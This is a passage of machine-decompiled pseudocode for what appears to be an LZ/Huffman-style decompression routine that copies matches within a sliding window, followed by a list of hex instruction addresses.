				intOrPtr _t530;
				void* _t532;
				signed int _t535;
				signed int _t536;
				intOrPtr* _t538;
				void* _t539;
				signed int _t542;
				intOrPtr _t545;
				unsigned int _t552;
				void* _t554;
				signed int _t557;
				signed int _t559;
				signed int _t561;
				intOrPtr _t563;
				void* _t565;
				signed int _t568;
				signed int _t569;
				signed int _t571;
				signed int _t573;
				void* _t575;
				signed int _t578;
				intOrPtr* _t580;
				void* _t581;
				signed int _t584;
				void* _t587;
				signed int _t590;
				intOrPtr* _t593;
				void* _t594;
				signed int _t597;
				void* _t600;
				signed int _t603;
				intOrPtr* _t607;
				void* _t608;
				signed int _t611;
				signed int _t614;
				unsigned int _t616;
				signed int _t619;
				signed int _t620;
				unsigned int _t622;
				signed int _t625;
				signed int _t628;
				signed int _t629;
				signed int _t630;
				signed int _t633;
				unsigned int _t635;
				signed int _t638;
				signed int _t641;
				signed int _t644;
				intOrPtr* _t645;
				unsigned int _t647;
				signed int _t650;
				signed int _t651;
				signed int _t652;
				signed int _t653;
				intOrPtr _t654;
				signed int _t655;
				signed int _t656;
				signed int _t657;
				signed int _t658;
				signed int _t659;
				signed int _t660;
				signed int _t661;
				signed int _t662;
				void* _t663;
				intOrPtr _t666;
				intOrPtr* _t667;
				intOrPtr* _t668;
				signed int _t671;
				signed int _t673;
				intOrPtr* _t675;
				signed int _t677;
				signed int _t680;
				intOrPtr* _t681;
				signed int _t682;
				signed int _t683;
				signed int _t684;
				signed int _t685;
				void* _t691;

				_t654 =  *((intOrPtr*)(_t691 + 0x34));
				_t663 = __ecx;
				if( *((char*)(_t654 + 0x2c)) != 0) {
					L3:
					_t505 =  *((intOrPtr*)(_t654 + 0x18));
					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E0006A800(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E0006A800(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E0006A800(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E0007F4B0(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E0007F4B0(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E00073952(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E00071E22(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E0006A800(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E0006A800(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E0007F4B0(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E0007815A(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E0007815A(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E0006A800(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E00074BB3(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E00073D6D(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}

0x000770c4
0x000770c8
0x000770ce
0x000770f7
0x000770fa
0x000770ff
0x00077102
0x000770e9
0x000770e9
0x00000000
0x00077104
0x0007710f
0x00077112
0x00077115
0x00077119
0x0007711d
0x00077121
0x00077123
0x00077125
0x00077125
0x00077129
0x00077136
0x00077136
0x0007713c
0x0007713f
0x00077141
0x00077145
0x00000000
0x00000000
0x00077147
0x00077147
0x00077149
0x000776d4
0x000776d4
0x000776d6
0x00000000
0x000776d7
0x0007714f
0x0007715d
0x0007715d
0x0007715f
0x0007716e
0x0007716e
0x00077174
0x00077a23
0x00077a23
0x00000000
0x00077a23
0x00000000
0x00077174
0x00077161
0x00077168
0x00000000
0x00000000
0x00000000
0x00077168
0x00077154
0x00077157
0x00000000
0x00000000
0x00000000
0x0007717a
0x0007717a
0x00077187
0x0007718c
0x000771c0
0x000771c0
0x000771c5
0x000771cc
0x000771d2
0x000771d8
0x000771dc
0x00077216
0x00077217
0x00077218
0x0007721a
0x00077233
0x00077236
0x0007723d
0x00077240
0x00077243
0x0007724c
0x00077255
0x00077257
0x0007725a
0x0007725c
0x0007725c
0x0007725e
0x00077266
0x00077269
0x0007726e
0x00077270
0x00077289
0x0007728f
0x000776ab
0x000776ad
0x000776e0
0x000776e6
0x00077802
0x00077802
0x0007780b
0x0007780e
0x00077810
0x00077814
0x00077823
0x00077823
0x00077826
0x0007782b
0x00077832
0x00077838
0x0007783e
0x00077845
0x00077873
0x00077874
0x00077875
0x00077877
0x00077893
0x00077896
0x0007789d
0x000778a0
0x000778a3
0x000778af
0x000778bb
0x000778bd
0x000778c3
0x000778c5
0x000778c5
0x000778c7
0x000778cf
0x000778cf
0x000778d2
0x000778d5
0x000778e6
0x000778e9
0x000778e9
0x000778d7
0x000778d7
0x000778d7
0x000778eb
0x000778ee
0x000778f0
0x000778f5
0x000778fc
0x00077904
0x00077906
0x0007790d
0x00077910
